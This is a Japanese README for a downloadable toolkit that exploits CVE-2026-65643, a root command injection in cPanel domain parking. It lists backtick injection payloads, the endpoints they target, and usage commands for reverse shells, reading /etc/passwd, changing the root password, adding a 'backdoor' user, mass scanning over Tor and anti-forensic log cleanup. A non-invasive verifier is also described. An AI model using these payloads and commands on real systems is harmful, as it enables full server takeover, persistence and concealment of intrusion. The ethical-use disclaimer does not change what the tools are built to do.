
Red/Blueチーム向けツールキット。CVE-2026-65643(cPanelのドメインパーキングにおけるRCE)に対応。リバースシェル、ウェブシェル、永続化、マススキャンを備えたエクスプロイトに加え、検知および監査用の非侵襲型検証ツールを含む。

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト このリポジトリは、許可されたセキュリティ専門家、ブルーチーム、ペネトレーションテスターのみを対象としたツールを提供します。 コンピュータシステムへの不正アクセスは、米国CFAA、英国Computer Misuse Act、トルコTCK 243/244、および世界各国の同様の法律で違法とされています。
CVE‑2026‑65643 は、cPanel & WHM 11.x における重大なコマンドインジェクション脆弱性であり、認証済みのcPanelユーザーがドメインパーキング機能を介してroot権限で任意のシステムコマンドを実行できるようにします。
`)を使用してシェルコマンドを注入できるようになります。| ツール | 目的 | 対象ユーザー |
|---|---|---|
exploit.py | リバースシェル、ウェブシェル、永続化、ファイル読み書き、rootパスワード変更、マススキャン、Torサポート、OPSEC機能を備えた完全な武器化ツールキット。 | レッドチーム / 許可されたペンテスター |
verifier.py | 悪意のあるペイロードを実行せずにcPanelバージョンを検出し、インジェクションを検証し、リスクを評価する非侵襲的な脆弱性チェッカー。詳細なレポートを生成します。 | ブルーチーム / セキュリティ監査人 |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.py パラメータverifier.py パラメータこのエクスプロイトは以下のcPanelエンドポイントとインジェクション方式を使用します:
# インジェクションペイロード形式
test.com`<command>`
# 例
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
このソフトウェアは教育目的および許可されたセキュリティテストのみを目的として提供されています。
| 機能 | exploit.py | verifier.py |
|---|
| 脆弱性検出 | ✅ | ✅ |
| バージョン検出(4エンドポイント) | ✅ | ✅ |
| コマンドインジェクション | ✅ | ❌ |
| リバースシェル | ✅ | ❌ |
| WebShellアップロード | ✅ | ❌ |
| 永続化(cPanelユーザー作成) | ✅ | ❌ |
| rootパスワード変更 | ✅ | ❌ |
| ファイル読み書き | ✅ | ❌ |
| 4つのインジェクション方式(JSON/Form/CGI/API2) | ✅ | ✅ |
| Torサポート(匿名性) | ✅ | ❌ |
| User‑Agentローテーション(OPSEC) | ✅ | ❌ |
| ジッター(OPSEC) | ✅ | ❌ |
| マススキャン(マルチスレッド) | ✅ | ❌ |
| 対話型シェル | ✅ | ❌ |
| 非侵襲的(安全)モード | ❌ | ✅ |
| タイムラインログ | ✅ | ✅ |
| HTMLレポート | ✅ | ❌ |
| JSONレポート | ✅ | ✅ |
| ログクリーンアップ(アンチフォレンジック) | ✅ | ✅ |
| プロキシサポート | ✅ | ✅ |
| カスタムUser‑Agent | ✅ | ✅ |
| SSL検証制御 | ✅ | ✅ |
| シナリオ | 推奨ツール |
|---|
| ブルーチーム – cPanelインストールが脆弱かどうかの確認 | verifier.py |
| セキュリティ監査 – 非侵襲的な脆弱性評価 | verifier.py |
| レッドチーム – 完全なエクスプロイトを伴う許可されたペネトレーションテスト | exploit.py |
| バグバウンティ – 責任ある開示テスト | verifier.py |
| マススキャン – 複数のターゲットの脆弱性確認 | exploit.py(検出のみ) |
| インシデントレスポンス – システムが侵害されているかの確認 | verifier.py |
| パラメータ | 説明 |
|---|
-t, --target | 対象cPanel URL(例:https://cpanel.example.com:2083) |
-l, --target-file | マススキャン用のターゲットリストを含むファイル(1行に1つ) |
-u, --username | cPanelユーザー名 |
-P, --password | cPanelパスワード |
-p, --port | cPanelポートの上書き(デフォルトはURLまたは2083) |
--threads | マルチターゲット用スレッド数(デフォルト:10) |
-o, --output | JSONレポートをファイルに保存 |
--html-report | HTMLレポートをファイルに保存 |
-v, --verbose | 詳細出力 |
--proxy | HTTP/HTTPSプロキシ(例:http://127.0.0.1:8080) |
--tor | Tor経由でルーティング(localhost:9050) |
-ua, --user-agent | カスタムUser‑Agent |
--no-keep-alive | セッションを維持しない |
--delay | リクエスト間の遅延(デフォルト:2.0秒) |
--jitter | リクエスト間のランダムジッター(0〜1秒)(デフォルト:0.5) |
--max-retries | 最大リトライ回数(デフォルト:5) |
--ssl-verify | SSL証明書の検証 |
--timeout | リクエストタイムアウト(デフォルト:15秒) |
--cmd | ターゲット上で単一のコマンドを実行 |
--reverse-shell | リバースシェル IP:PORT |
--passwd | rootパスワードの変更 |
--adduser | cPanelユーザーの作成(USER DOMAIN PASSWORD) |
--read | ファイルの読み取り |
--write | ファイルの書き込み(パスを指定) |
--write-content | 書き込むコンテンツ |
--cleanup | エクスプロイト後のログと履歴のクリーンアップ |
-i, --interactive | エクスプロイト後の対話型シェル |
--domain-suffix | パーク済みドメインのサフィックス(デフォルト:exploit.local) |
| パラメータ | 説明 |
|---|
-t, --target | 対象cPanel URL(例:https://cpanel.example.com:2083) |
-u, --username | cPanelユーザー名 |
-P, --password | cPanelパスワード |
-o, --output | JSONレポートをファイルに保存 |
-v, --verbose | 詳細出力 |
--proxy | HTTP/HTTPSプロキシ(例:http://127.0.0.1:8080) |
--tor | Tor経由でルーティング(localhost:9050) |
--ssl-verify | SSL証明書の検証 |
--timeout | リクエストタイムアウト(デフォルト:15秒) |
--cleanup | テスト後のログのクリーンアップ |
| # | シナリオ | コマンド |
|---|
| 1 | クイック脆弱性チェック | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | レポート付き詳細スキャン | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | リバースシェル | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | コマンド実行 | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | 機密ファイルの読み取り | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | rootパスワードの変更 | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | 新しいcPanelユーザーの作成(永続化) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | エクスプロイト後の対話型シェル | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | ファイルからのマススキャン | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | プロキシ、Tor、カスタムUser‑Agentの使用 | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | エクスプロイト後のログクリーンアップ | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| 方式 | エンドポイント | 説明 |
|---|
| JSON API | /cpsessXXXXX/json-api/domain | JSONペイロードによる主要なインジェクション方式 |
| フォームデータ | /cpsessXXXXX/json-api/domain | フォームエンコードデータによる代替インジェクション |
| CGIスクリプト | /cgi-sys/domainpark.cgi | レガシーCGIエンドポイントインジェクション |
| API2 | /cpsessXXXXX/json-api/cpanel | レガシーAPI2インジェクション方式 |